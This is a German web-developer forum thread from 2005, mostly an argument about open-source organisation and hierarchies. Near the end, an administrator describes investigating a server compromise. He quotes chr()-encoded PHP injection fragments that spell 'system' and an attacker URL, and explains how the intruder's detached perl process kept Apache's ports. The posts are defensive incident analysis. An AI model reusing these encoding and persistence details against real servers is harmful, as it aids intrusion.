<p><a href="http://soaplite.com/team.html" rel="nofollow noopener noreferrer">http://soaplite.com/team.html</a></p> <p>Du und deine Vorurteile … Die Qualität einer Software hat mit deren Lizenz nichts zu tun.</p> <blockquote> <p>Mobbing und Antipathien moechte ich nicht belegen, beides ist aber typisch im ehrenamtlichen Bereich.</p> </blockquote> <p>Ohne Belege ist das nur eine Behauptung. Ich behaupte das Gegenteil.</p> <blockquote> <p>(BTW - ich fuehle mich hier relativ oft unnoetig unfreundlich angegangen, oft von dem- oder denselben.)</p> </blockquote> <p>What goes around comes around, dude. ;-)</p> <blockquote> <blockquote> <blockquote> <p>fehlende hierarchische Strukturen</p> </blockquote> <p>Die Devs beispielsweise arbeiten in uneingeschränkter Anarchie.</p> </blockquote> <p>Aber es gibt _den_ Chefentwickler.</p> </blockquote> <p>Nein. Niemand hat das Sagen, es sei denn, es handelt sich um ein externes Projekt, das zur Verfügung gestellt wird. Und selbst dann werden Wünsche nicht durchgedrückt. Das hat auch etwas mit der Wertschätzung geleisteter Arbeit zu tun.</p> <blockquote> <p>Ausserdem gibt es eine, ich sage mal politisch (im uebrtragenden Sinn) aehnliche Ausrichtung, die die Leute zusammenhalten laesst.</p> </blockquote> <p>Im Großen und Ganzen kann ich dir da nur zustimmen. Unterschiedliche Auffassungen treten meist erst bei Detailfragen zutage.</p> <blockquote> <p>die Devs sind doch auch hierarchisch aufgestellt,</p> </blockquote> <p>Nein. An <a href="http://aktuell.de.selfhtml.org/people/devs.htm#wer" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/people/devs.htm#wer</a> solltest du dich nicht orientieren, diese Aufstellung ist äußerst unscharf und gibt nur einen allgemeinen Überblick.</p> <p>Interessant ist in diesem Zusammenhang, dass selbst bei der Arbeit an SELFHTML 8.1, für die sich eine <a href="http://de.selfhtml.org/editorial/impressum.htm#redaktion" rel="nofollow noopener noreferrer">bunte Truppe</a> aus Devs und Nicht-Devs zusammengefunden hatte und trotz des gewaltigen Arbeitspensums und des selbstauferlegten Drucks nie eine übergeordnete Instanz notwendig war. Ich hatte meine Zweifel, dass das Projekt so gut funktionieren würde. Aber so war es und das ist ein geiles Gefühl.</p> <blockquote> <p>es gibt doch eine Aufgabenverteilung mit Schwerpunkten (Das ist auch eine Hierarchie, aber wenns hart auf hart kommt, fehlt der Entscheider.).</p> </blockquote> <p>Die Aufgabenverteilung orientiert sich an den fachlichen Interessen der Mitwirkenden und an deren verfügbarer Freizeit. Nicht so bei allgemeinen Entscheidungen, da wird kreuz und quer diskutiert und schlussendlich ein breiter Konsens angestrebt. Einstimmige Beschlüsse sind sogar relativ selten, irgendwer muss immer dagegen sein und wird anschließend verprügelt. ;-) Ein Entscheider hätte mit dem Problem zu kämpfen, die Hälfte der Mannschaft gegen sich zu haben und das wäre wahrlich kein Spaß.</p> <blockquote> <p>Aber, um Missverstaendnissen vorzubeugen, ich habe und hatte nicht vor die Devs zu kritisieren,</p> </blockquote> <p>Damit hätte ich kein Problem. Ein Werk, das nicht kritisiert wird, ist keines.</p> <blockquote> <p>mir ging es um open source und community im Vergleich zur Wirtschaft (auch da wird gefrickelt, aber die Organisationsform produziert bessere Ergebnisse.)</p> </blockquote> <p>Das hängt davon ab, was du erwartest. Einen Support-Anspruch gibt es bei OS in der Regel nicht. Dennoch werden Fehler bei großen Projekten verdammt schnell behoben, ob das wohl etwas mit der Motivation zu tun hat, die dahintersteckt?</p> <blockquote> <blockquote> <p>Wer etwas umsetzt, hat Recht.</p> </blockquote> <p>Wer erfolgreich umsetzt scheint recht zu haben. Ich weiss aber nicht genau, ob das stimmt. Es ist naemlich nicht nur wichtig, dass es "funzt", sondern dass das bereitgestellte System auch weiterentwicklungsfaehig, wartungsfreundlich und skalierbar ist.</p> </blockquote> <p>Das ist der anzustrebende Idealzustand, allerdings entwickeln sich die besten Lösungen oft aus Provisorien. Man kann die Entwicklung eines Projekts nicht vorhersagen. In diesem Punkt ist ein profitorientiertes Unternehmen zurecht konservativ, man kann im ehrenamtlichen Bereich mehr riskieren.</p> <blockquote> <blockquote> <p>was soll „frickeln“ aussagen?</p> </blockquote> <p>Ich weiss auch nicht was frickeln ist. Ich habe das Wort aufgegriffen, weil es lustig ist und anschienend hier tabuisiert.</p> </blockquote> <p>Nur kurzfristig, denn wir stehen trotz aller Reibereien ein gute Stück weit über heise.</p> <blockquote> <p>Was ich persoenlich mit frickeln meine ist das Zusammenfriemeln (Kodieren) bestimmter nicht so relevanter Funktionalitaeten, also bspw. von UIs. Aber da kann man anderer Meinung sein, kein Problem.   :-)</p> </blockquote> <p>Dann nehme ich dieses Angebot gerne in Anspruch. ;-)</p> <p>Grüße<br> Roland</p> <div class="signature">-- <br> <a href="http://aktuell.de.selfhtml.org/tippstricks/css/drucklayout/" rel="nofollow noopener noreferrer">CSS für ein Druck-Layout</a><br> <a href="http://www.schweikhardt.net/wider-die-sinnmacher.html" rel="nofollow noopener noreferrer">Traktat wider die Sinnmacher</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821304#m821304 Mathias Bigge bigge.keinspam@port-vision.de http://www.port-vision.de 2005-06-12T19:42:25Z 2005-06-12T19:42:25Z Haltet eure PHP-Software aktuell! <p>Hi Ludger,</p> <blockquote> <p>Mobbing und Antipathien moechte ich nicht belegen, beides ist aber typisch im ehrenamtlichen Bereich. (BTW - ich fuehle mich hier relativ oft unnoetig unfreundlich angegangen, oft von dem- oder denselben.)</p> </blockquote> <p>Welchen Beitrag könntest Du leisten, um Deine Position zu verändern?</p> <blockquote> <p>Aber es gibt _den_ Chefentwickler. Ausserdem gibt es eine, ich sage mal politisch (im uebrtragenden Sinn) aehnliche Ausrichtung, die die Leute zusammenhalten laesst.</p> </blockquote> <p>Was bedeutet das? Ich sehe diese "Linie" nicht.</p> <blockquote> <p>Ich bin davon ueberzeugt, dass Hierarchien absolut erforderlich sind.</p> </blockquote> <p>Ganz interessant: Das Schlagwort heißt heute gerade im kommerziellen Bereich "funktionale Ausdifferenzierung", nicht "Erweiterung der Hierarchie. Das führt automatisch zu weniger hierarchischen Strukturen und zu mehr Selbständigkeit und Eigenverantwortlichkeit der Subsysteme. Vielleicht versuchst Du mal, Dich da auf modernere Auffassungen einzulassen.</p> <blockquote> <p>BTW - die Devs sind doch auch hierarchisch aufgestellt, es gibt doch eine Aufgabenverteilung mit Schwerpunkten</p> </blockquote> <p>Funktionale Ausdifferenzierung führt nicht automatisch zum Aufbau von Hierarchien. Gerade im DEV-Bereich hatten wir lange Probleme, weil sich Kollegen schwer getan haben, ohne hierarchische Absicherung selbständig Entscheidungen zu treffen. Inzwischen haben wir uns weiterentwickelt. Jeder entscheidet weitgehend selbst, wann er eine Entscheidung in seinem Bereich selbst treffen kann, oder wann er sie zur Diskussion stellen muss. Es gibt auch die andere Variante, nämlich die Frage, wann man für einen anderen Bereich tätig werden kann, ohne sich mit den dortigen Strukturen näher auseinanderzusetzen.</p> <p>Diese von Orlando als anarchistisch bezeichnete entwickelte Arbeitsteilung ersetzt Hierarchie durch einen erweiterten Kommunikations- und Dokumentationsbedarf, da gibt es bei uns noch kleinere Lücken, aber wir haben bereits einige Mittel/Tools entwickelt, um die Kommunikation zwischen den eigenständig arbeitenden Bereichen zu verbessern.</p> <p>Einige Beispiele:</p> <ul> <li>Der gesamte Bereich "selfaktuell" wird durch ein Versionssystem verwaltet, so dass Änderungen immer nachzuvollziehen sind.</li> <li>Neben DEV-Forum, Real-Life-Treffen, informeller Kommunikation und den DEV-Chats denken wir über ein Wiki als zusätzliches Informations- und Dokumentationssystem nach.</li> <li>Durch ein entsprechendes Tool kann man jederzeit Fragen zur Abstimmung stellen.</li> <li>Durch den Bugtracker haben wir eine zentrale Stelle zur Fehlerbehandlung.</li> <li>Zur Zeit werden Redaktionsstrukturen für technische Arbeitsbereiche ausgebaut.</li> </ul> <blockquote> <p>open source und community im Vergleich zur Wirtschaft (auch da wird gefrickelt, aber die Organisationsform produziert bessere Ergebnisse.)</p> </blockquote> <p>Ich denke, kaum ein Bereich ist stärker ausdifferenziert als der unternehmerischer Tätigkewit vom Kiosk bis zum Weltkonzern. Das lässt sich auch verfolgen, wenn man sich mit Statistiken zu Selbständigen auseinandersetzt, die häufig durch diffuse Ergebnisse gekennzeichnet sind. Um einen korrekten Vergleich zwischen SELFHTML e.V. und einem Unternehmen durchführen zu können, müsste man etwa die Effektivität und den Output eines kleinen IT-Unternehmens oder einer Firma, die technische Dokumentationen erstellt, heranziehen.</p> <p>Die pauschale Gegenüberstellung von Vereinen und Wirtschaft trifft nicht. Es ist zudem wichtig zu wissen, dass der eingetragene Verein durchaus so etwas wie eine Unternehmensform sein kann, die ökonomisch härter kalkuliert und besser organisiert als eine vergleichbares Einzelunternehmen, das formal eine traditionelle Unternehmensform gewählt hat. Es gibt Vereine, die Millionenumsätze fahren.</p> <blockquote> <p>Wer erfolgreich umsetzt scheint recht zu haben. Ich weiss aber nicht genau, ob das stimmt. Es ist naemlich nicht nur wichtig, dass es "funzt", sondern dass das bereitgestellte System auch weiterentwicklungsfaehig, wartungsfreundlich und skalierbar ist.</p> </blockquote> <p>Ja. Das Kriterium ist richtig. Die Frage ist, ob nicht gerade IT-Unternehmen oder IT-Mitarbeiter in Unternehmen Interessen entwickeln, nicht so zu arbeiten. Schau Dir mal manche Unix-Software an, die über die Ärzte-Bildaschirme flimmert, und vor allem so konzipiert ist, dass ein Systemwechsel so aufwändig ist, dass man möglichst nicht wechseln oder skalieren kann. Ich halte das nicht für einen Ausnahmefall. Wenn Du an die IT-Großprojekte der letzten Jahre denkst, liegt der Verdacht nahe, das dort diese Prinzipien gezielt missachtet wurden.</p> <p>Ein großer Vorteil der open source Software ist m.E. der Zwang zur offenen Dokumentation, der einen besonderen Druck aufmacht, hohe Sicherheitsstandards zu setzen.</p> <blockquote> <blockquote> <blockquote> <p>Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird.</p> </blockquote> </blockquote> </blockquote> <p>Wenn Du an Linux und Derivate denkst, sitzen da inzwischen organisierte Profis an bestimmten Funktionen, open source kann durchaus ein wirtschaftliches Instrument sein. Dagegen findest Du jede Menge hingefummelter Software aus kommerzieller Quelle, die hinten und vorne nichts taugt. Denk nur an die ganzen Billigprogramme, wie sie in den Kaufhäusern verscherbelt werden.</p> <blockquote> <p>Ich weiss auch nicht was frickeln ist. Ich habe das Wort aufgegriffen, weil es lustig ist und anschienend hier tabuisiert.</p> </blockquote> <p>Ich möchte gerne der Letzte sein,<br> drum führt in meinem Namen die Hunde herein.</p> <p>Das Kriterium, ein Ideologem in einem Diskurszusammenhang einzusetzen, weil es eine Außenseiterposition markiert, bei gleichzeitigem Klagen über Mobbing und Mangel an Anerkennung entwickelt eine eigenartige Position....</p> <p>Viele Grüße<br> Mathias Bigge</p> <div class="signature">-- <br> <a href="http://aktuell.de.selfhtml.org/tippstricks/index.htm" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/tippstricks/index.htm</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821305#m821305 Ludger 2005-06-13T12:43:54Z 2005-06-13T12:43:54Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <p>wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist. ((Bekanntermassen ist die Monarchie das beste politische System sofern ein faehiger Monarch sein Werk tut. Ernsthafte Probleme gibts dann aber regelmaesig bei der Nachfolge. (Aber vielleicht kann man da zukuenftig mit Klonen was machen, Monarchkloning? Hmm!))</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821306#m821306 Swen Wacker Swen.Wacker@gmx.de 2005-06-13T13:27:50Z 2005-06-13T13:27:50Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Hi,</p> <p>wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist.</p> </blockquote> <p>Wer ist denn hier der Chefprogrammierer?</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821307#m821307 Ludger 2005-06-13T14:52:49Z 2005-06-13T14:52:49Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist.</p> </blockquote> <p>Wer ist denn hier der Chefprogrammierer?</p> </blockquote> <p>vielleicht Christian? Vielleicht auch Du? Bleiben wir doch ein wenig abstrakt.</p> <p>Anmerkung: "Chefprogrammierung" ist auch ein IT-Konzept,da gehts nicht um Macht und so</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821308#m821308 Swen Wacker Swen.Wacker@gmx.de 2005-06-13T20:11:40Z 2005-06-13T20:11:40Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <blockquote> <blockquote> <p>wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist.<br> Wer ist denn hier der Chefprogrammierer?<br> vielleicht Christian? Vielleicht auch Du? Bleiben wir doch ein wenig abstrakt.<br> Anmerkung: "Chefprogrammierung" ist auch ein IT-Konzept,da gehts nicht um Macht und so</p> </blockquote> </blockquote> </blockquote> <p>Den Begriff "Chefprogrammierung" als IT-Konzept kenne ich nicht und er erschließt sich mir auch nicht. Erklärst Du ihn mir bitte.</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821316#m821316 Ludger 2005-06-13T22:01:41Z 2005-06-13T22:01:41Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <p>Den Begriff "Chefprogrammierung" als IT-Konzept kenne ich nicht und er erschließt sich mir auch nicht. Erklärst Du ihn mir bitte.</p> </blockquote> <p>es gibt bspw. die ganz flache Aufstellung, wo bspw. einfach nur die Rollen Konzipierer, Entwickler, Tester, Dokumentierer und Frosch personell besetzt werden. Dann gehts los. Gibts Fragen und Probleme, die nicht schnell geklaert werden koennen, wird oft sogar ein "Externer" herangezogen, ein Wirtschaftsinformatiker oder Vertriebler beispielsweise, ein Kaufmann halt.</p> <p>Chefprogrammierer (es gibt exakt einen) haben dagegen entweder formal bestimmtes Weisungsrecht oder faktisches. Typischerweise macht der dann auch so Sachen wie managing by walking und greift mal hier mal da aktiv ein. Hat den Vorteil, dass die Abnehmer der Entwicklungsleistungen exakt _einen_ Ansprechpartner haben. (Bei der flachen Aufstellung gibt es oft ein Hin- und Hergeschiebe bei Schuldfragen, zudem kann fachliche Unkenntnis besser mit "sozialer Kompetenz" kompensiert werden.   :-(   )</p> <p>Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821309#m821309 at 2005-06-15T17:27:40Z 2005-06-15T17:27:40Z Haltet eure PHP-Software aktuell! <p>Hallo.</p> <blockquote> <p>Den Begriff "Chefprogrammierung" als IT-Konzept kenne ich nicht und er erschließt sich mir auch nicht. Erklärst Du ihn mir bitte.</p> </blockquote> <p>Dann hast du noch nie deinen Chef "programmiert"?<br> MfG, at</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821310#m821310 Swen Wacker Swen.Wacker@gmx.de 2005-06-16T10:47:26Z 2005-06-16T10:47:26Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Dann hast du noch nie deinen Chef "programmiert"?</p> </blockquote> <p>Über mir ist wer?</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821315#m821315 MudGuard http://www.andreas-waechter.de/ 2005-06-16T10:58:35Z 2005-06-16T10:58:35Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>Dann hast du noch nie deinen Chef "programmiert"?<br> Über mir ist wer?</p> </blockquote> </blockquote> <p>Deine Gespielin? ;-)</p> <p>cu,<br> Andreas</p> <div class="signature">-- <br> <a href="http://www.Mud-Guard.de/" rel="nofollow noopener noreferrer">Warum nennt sich Andreas hier MudGuard?</a><br> <a href="http://www.schreinerei-waechter.de/" rel="nofollow noopener noreferrer">Schreinerei Waechter</a><br> Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.<br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821311#m821311 at 2005-06-16T10:59:12Z 2005-06-16T10:59:12Z Haltet eure PHP-Software aktuell! <p>Hallo.</p> <blockquote> <blockquote> <p>Dann hast du noch nie deinen Chef "programmiert"?</p> </blockquote> <p>Über mir ist wer?</p> </blockquote> <p>Offenbar zumindest niemand, der dir den Unterschied zwischen Perfekt und Präsens erläutert (hat).<br> MfG, at</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821312#m821312 Swen Wacker Swen.Wacker@gmx.de 2005-06-16T18:18:46Z 2005-06-16T18:18:46Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <blockquote> <blockquote> <p>Dann hast du noch nie deinen Chef "programmiert"?<br> Über mir ist wer?<br> Offenbar zumindest niemand, der dir den Unterschied zwischen Perfekt und Präsens erläutert (hat).</p> </blockquote> </blockquote> </blockquote> <p>Pfff. Kannst Du genau sein. Die grammatisch richtige Antwort klingt nicht so witzig.</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821313#m821313 at 2005-06-16T18:29:33Z 2005-06-16T18:29:33Z Haltet eure PHP-Software aktuell! <p>Hallo.</p> <blockquote> <blockquote> <blockquote> <blockquote> <p>Dann hast du noch nie deinen Chef "programmiert"?<br> Über mir ist wer?<br> Offenbar zumindest niemand, der dir den Unterschied zwischen Perfekt und Präsens erläutert (hat).<br> Pfff. Kannst Du genau sein. Die grammatisch richtige Antwort klingt nicht so witzig.</p> </blockquote> </blockquote> </blockquote> </blockquote> <p>Entschuldige, machmal geht es mit mir durch, wenn jemand meine Pointe kontert. Dann werde ich schon mal spießig, präzise und ungerecht. Umso besser, wenn der andere dann deutlich über meiner Reaktion steht, und bei dir bin ich da ja genau an der richtigen Adresse gelandet.<br> MfG, at</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821314#m821314 Swen Wacker Swen.Wacker@gmx.de 2005-06-16T21:00:13Z 2005-06-16T21:00:13Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Umso besser, wenn der andere dann deutlich über meiner Reaktion steht</p> </blockquote> <p>Nicht so ganz :-) Ich fühlte mich schon zunächst ziemlich angegiftet und musste erstmal drei, vier Sätze schreiben und wieder löschen bis ich dann den richtigen Ton fand. Dann habe ich mir nämlich gedacht, dass deine Pointe gut ist (sie setzt nämlich da an - Grammatik und nicht etwa auf der Bilder-Ebene - wo niemand den Witz erwartet). Und außerdem will ich nicht immer gleich eingeschnappt sein.</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821317#m821317 Orlando http://skop.net/ 2005-06-13T22:13:33Z 2005-06-13T22:13:33Z Haltet eure PHP-Software aktuell! <p>Hallo Ludger,</p> <blockquote> <p>Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.</p> </blockquote> <p>Ich auch. Beide.</p> <p>Grüße<br> Roland</p> <div class="signature">-- <br> <a href="http://aktuell.de.selfhtml.org/tippstricks/css/drucklayout/" rel="nofollow noopener noreferrer">CSS für ein Druck-Layout</a><br> <a href="http://www.schweikhardt.net/wider-die-sinnmacher.html" rel="nofollow noopener noreferrer">Traktat wider die Sinnmacher</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821320#m821320 Ludger 2005-06-13T22:25:55Z 2005-06-13T22:25:55Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.</p> </blockquote> <p>Ich auch. Beide.</p> </blockquote> <p>der Christian Seiler ist mir bisher durch Anpassungen so genannter Templates aufgefallen.</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821318#m821318 Swen Wacker Swen.Wacker@gmx.de 2005-06-14T04:50:22Z 2005-06-14T04:50:22Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <blockquote> <p>Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.</p> </blockquote> <p>Ich auch. Beide.</p> </blockquote> <p>Neulich was Andreras Chefentwickler. Und Dani ist auch immer wieder Chefentwicklerin. Und Thomas sowieso. Soll ich auch mal?</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821319#m821319 Orlando http://skop.net/ 2005-06-14T05:28:08Z 2005-06-14T05:28:08Z Haltet eure PHP-Software aktuell! <p>Hallo Swen,</p> <blockquote> <p>Neulich was Andreras Chefentwickler. Und Dani ist auch immer wieder Chefentwicklerin. Und Thomas sowieso. Soll ich auch mal?</p> </blockquote> <p>Natürlich, schließlich entwickelst du mindestens unseren Kontostand. Die „Verpeilungen“ waren ferner ganz klar eine Chefentwicklung, also darf ich dir zu diesem Aufstieg herzlich gratulieren. ;-p</p> <p>Grüße<br> Roland</p> <div class="signature">-- <br> <a href="http://aktuell.de.selfhtml.org/tippstricks/css/drucklayout/" rel="nofollow noopener noreferrer">CSS für ein Druck-Layout</a><br> <a href="http://www.schweikhardt.net/wider-die-sinnmacher.html" rel="nofollow noopener noreferrer">Traktat wider die Sinnmacher</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821324#m821324 Ludger 2005-06-10T11:41:35Z 2005-06-10T11:41:35Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <p>Wenn man glaubt, die Wikipedia würde funktionieren, hat man höchstwahrscheinlich einfach nicht genau hingeschaut. Äußerlichen Schein produziert vor allem die technisch-formale Ordnung. Es wird unendlich viel Engagement investiert, das Formale zu wahren und durchzusetzen. Schaut man unter diese vermeintlich wohlgeordnete Oberfläche, findet man eben vornehmlich Irrationalität und für vernünftige Arbeit unergiebige Strukturen.</p> </blockquote> <p>na gut, aber es scheint ein m.E. mit unserem politischen demokratischen System ("D") vergleichbarer Erfolg vorhanden zu sein. Was mir erst einmal reichen wuerde. "king of the hill" sollte ja auch keiner werden, so ohne weiteres.</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821323#m821323 at 2005-06-15T15:54:05Z 2005-06-15T15:54:05Z Haltet eure PHP-Software aktuell! <p>Hallo.</p> <blockquote> <p>Äußerlichen Schein produziert vor allem die technisch-formale Ordnung. Es wird unendlich viel Engagement investiert, das Formale zu wahren und durchzusetzen. Schaut man unter diese vermeintlich wohlgeordnete Oberfläche, findet man eben vornehmlich Irrationalität und für vernünftige Arbeit unergiebige Strukturen.</p> </blockquote> <p>Das beschriebene Phänomen nennt sich "Demokratie" und kennt diese Nebenwirkungen seit Jahr und Tag in all seinen Facetten.<br> MfG, at</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821326#m821326 Ludger 2005-06-10T11:22:47Z 2005-06-10T11:22:47Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <p>Du hast _nichts_ verstanden. Occuris ist eine Firma, sie hat _nichts_ mit ehrenamtlicher Tätigkeit zu tun.</p> </blockquote> <p>ach so, ich habs vergessen, Du spielst ja immer die formale Karte. Nun, wenn open source basierte software kostenfrei ist, dann haben Abnehmer dieser die in meinen Postings weiter oben genannten Probleme.</p> <p>Wirklich wahr, da kann man nicht einfach sagen, open source "ist wie normale software", ist es naemlich definiv nicht (wenn _DER_MEISTER_ meine postings noch lesen wuerde! ;-). Der den ueblichen Konventionen widersprechenden "Nicht-Verguetungsgedanke" kann m.E. auch nicht dadurch begruendet und gerechtfertigt werden, dass die Verguetung ggf. spaeter und ggf. indirekt erfolgt. (Auch, wenn es da Teilerfolge gibt, aber warum gibt es diese ueberhaupt?)</p> <p>Gruss,<br> Ludger</p> <div class="signature">-- <br> "Frickelt ruhig weiter!" </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821327#m821327 Mathias Bigge bigge.keinspam@port-vision.de http://www.port-vision.de 2005-06-10T18:56:25Z 2005-06-10T18:56:25Z Haltet eure PHP-Software aktuell! <p>Hi Ludger,</p> <blockquote> <blockquote> <p>Du hast _nichts_ verstanden. Occuris ist eine Firma, sie hat _nichts_ mit ehrenamtlicher Tätigkeit zu tun.<br> ach so, ich habs vergessen, Du spielst ja immer die formale Karte. Nun, wenn open source basierte software...</p> </blockquote> </blockquote> <p>Webhosting, nicht Software. Mein Gott, bist Du merkbefreit...</p> <blockquote> <p>wenn _DER_MEISTER_ meine postings noch lesen wuerde! ;-)</p> </blockquote> <p>würde er sehen, dass Du Dir nicht die geringste Mühe gibst, die Argumente Deines Gesprächspartners auch nur wahrzunehmen, sondern zuverlässig irgendeinen der Schubladentexte absonderst.</p> <p>Viele Grüße<br> Mathias Bigge</p> <div class="signature">-- <br> <a href="http://aktuell.de.selfhtml.org/tippstricks/index.htm" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/tippstricks/index.htm</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821332#m821332 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T08:57:22Z 2005-06-10T08:57:22Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <blockquote> <blockquote> <blockquote> <p>grep wget /var/log/apache/*</p> </blockquote> <p>Das bringt nichts. So blöd sind die Jungs ja nun nicht.</p> </blockquote> <p>Oh doch, Deine vielleicht nicht, aber man liest es doch immer wieder...</p> </blockquote> <p>Hehe ;-)</p> <blockquote> <blockquote> <p>Da wird mit chr() und<br> ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen<br> gefunden.</p> </blockquote> <p>und wie wenn ich fragen darf? (wo hast Du wonach gesucht?)</p> </blockquote> <p>Erst nach</p> <p>%252echr(115)%252e%252echr(121)%252e%252echr(115)%252e%252echr(116)%252e%252echr(101)%252e%252echr(109)%252e</p> <p>gesucht (system), dann in den Ergebnissen nach der URL gesucht:</p> <p>chr(103)%252echr(101)%252echr(111)%252echr(99)%252echr(105)%252echr(116)%252echr(105)%252echr(101)%252echr(115)</p> <p>Dann geguckt, ob die Software anfällig ist. Und “schon” hatte ich den<br> Schuldigen.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Die Summe zweier gerade Primzahlen ist immer eine Quadratzahl.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821329#m821329 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T10:49:08Z 2005-06-10T10:49:08Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <p>das lustige an der Aktion war: dadurch, dass der Prozess mit “perl ... %”<br> gestartet wurde, war der Prozess ein Kind-Prozess des Apache und hat seine<br> Sockets geerbt, inkl. des Sockets, der auf Port 80 lauscht und des Sockets,<br> der auf Port 443 lauscht. Und dadurch, dass er sich aus der Prozessgruppe<br> gelöst hat (fork() mit setsid()) wurde er vom nächtlichen Logrotate nicht<br> betroffen. Das hat dazu geführt, dass auf Port 80 und Port 443 auch noch<br> ein Prozess lauschte, als der Apache sich beendet hat. Dadurch konnte der<br> Apache durch das logrotate-Script nicht neu gestartet werden. Das war<br> letztenendes das, woran ich es heute morgen sofort gemerkt hatte ;-)</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Denn wer 'ne Blacklist hat, muss halt daran denken, dass er manches nicht sieht... und vor dem posten die Realitaet einschalten<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821330#m821330 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T11:07:00Z 2005-06-10T11:07:00Z Haltet eure PHP-Software aktuell! <p>Hallo Christian!</p> <blockquote> <p>Das war<br> letztenendes das, woran ich es heute morgen sofort gemerkt hatte ;-)</p> </blockquote> <p>Das wäre auch meine nächste Frage gewesen ;-)</p> <p>Wundert mich allerdings dass das so funktioniert?! Ich vermute mal, dass Du entsprechend mod_php einsetzt. Angenommen man verwendet (wie ich es eigentlich eher empfehlen würde) CGI mit suphp, so dass der CGI-Prozess immer unter der UID des Anwenders läuft, dann wäre das wohl nicht passiert (mit dem fehlgeschlagenen restart). Wie merkt man sowas am einfachsten, ohne jetzt ein dickes IDS-Geschütz aufzufahren? Am besten wohl durch regelmäßiger Port-Scans von außerhalb, oder?</p> <p>Grüße<br> Andreas</p> <div class="signature">-- <br> SELFHTML Tipps & 